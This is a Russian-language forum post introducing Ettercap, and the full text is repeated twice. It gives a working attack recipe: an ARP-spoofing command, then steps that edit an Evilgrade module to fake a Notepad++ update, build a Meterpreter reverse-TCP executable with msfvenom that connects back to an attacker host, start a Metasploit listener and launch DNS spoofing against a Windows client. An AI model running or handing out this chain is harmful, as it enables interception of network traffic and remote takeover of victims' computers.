B
Bad-Dag
Original poster
Здравствуйте, в этой статье мы познакомимся с такими инструментом как: Ettercap,
Ettercap – сниффер и не только
Еttercap — инструмент для анализа безопасности компьютерной сети, обладающий большим количеством
разнообразных возможностей, но ставший особо популярным за умение выполнять атаку ARP-spoofing.
Так же, умеет анализировать трафик и извлекать пароли различных протоколов - от http и ftp до imap и nfs.
Может работать в трех режимах — консольном/текстовом (-T), псевдографике/ncurses (-C) или в графическом
варианте (-G).
Пример проведения атаки типа ARP spoofing c использованием Ettercap:
ettercap -T -q -M arp:remote -L log /IP_gateway/ /IP_windowsClient/
DNS Spoofing с использованием Ettercap и дальнейшая эксплуатация жертвы с помощью фреймворка Evilgrade
1) Вначале необходимо проверить и внести правки в файл выбранного модуля Evilgrade
nano /usr/share/isr-evilgrade/modules/notepadplus.pm
2) Добавить необходимую A-запись в модуль Ettercap, отвечающий за атаку типа dns spoofing
nano /etc/ettercap/etter.dns
3) Создать пейлоад, используя возможности фреймворка metasploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_IP LPORT=8765 -f exe > /tmp/agent.exe
4) Запустить слушатель, готовый принимать подключения от пейлоада
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST attacker_IP;
set LPORT 8765; exploit -j"
5) Сконфигурировать и запустить Evilgrade
evilgrade> configure notepadplus
evilgrade> show options
evilgrade> set agent /tmp/agent.exe
evilgrade> start
6) Последний шаг — запуск атаки dns spoofing с помощью ettercap
ettercap -T -q -M arp:remote -P dns_spoof /IP_gateway// /IP_windowsClient//
Всем спасибо за внимание.
Ettercap – сниффер и не только
Еttercap — инструмент для анализа безопасности компьютерной сети, обладающий большим количеством
разнообразных возможностей, но ставший особо популярным за умение выполнять атаку ARP-spoofing.
Так же, умеет анализировать трафик и извлекать пароли различных протоколов - от http и ftp до imap и nfs.
Может работать в трех режимах — консольном/текстовом (-T), псевдографике/ncurses (-C) или в графическом
варианте (-G).
Пример проведения атаки типа ARP spoofing c использованием Ettercap:
ettercap -T -q -M arp:remote -L log /IP_gateway/ /IP_windowsClient/
DNS Spoofing с использованием Ettercap и дальнейшая эксплуатация жертвы с помощью фреймворка Evilgrade
1) Вначале необходимо проверить и внести правки в файл выбранного модуля Evilgrade
nano /usr/share/isr-evilgrade/modules/notepadplus.pm
2) Добавить необходимую A-запись в модуль Ettercap, отвечающий за атаку типа dns spoofing
nano /etc/ettercap/etter.dns
3) Создать пейлоад, используя возможности фреймворка metasploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_IP LPORT=8765 -f exe > /tmp/agent.exe
4) Запустить слушатель, готовый принимать подключения от пейлоада
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST attacker_IP;
set LPORT 8765; exploit -j"
5) Сконфигурировать и запустить Evilgrade
evilgrade> configure notepadplus
evilgrade> show options
evilgrade> set agent /tmp/agent.exe
evilgrade> start
6) Последний шаг — запуск атаки dns spoofing с помощью ettercap
ettercap -T -q -M arp:remote -P dns_spoof /IP_gateway// /IP_windowsClient//
Всем спасибо за внимание.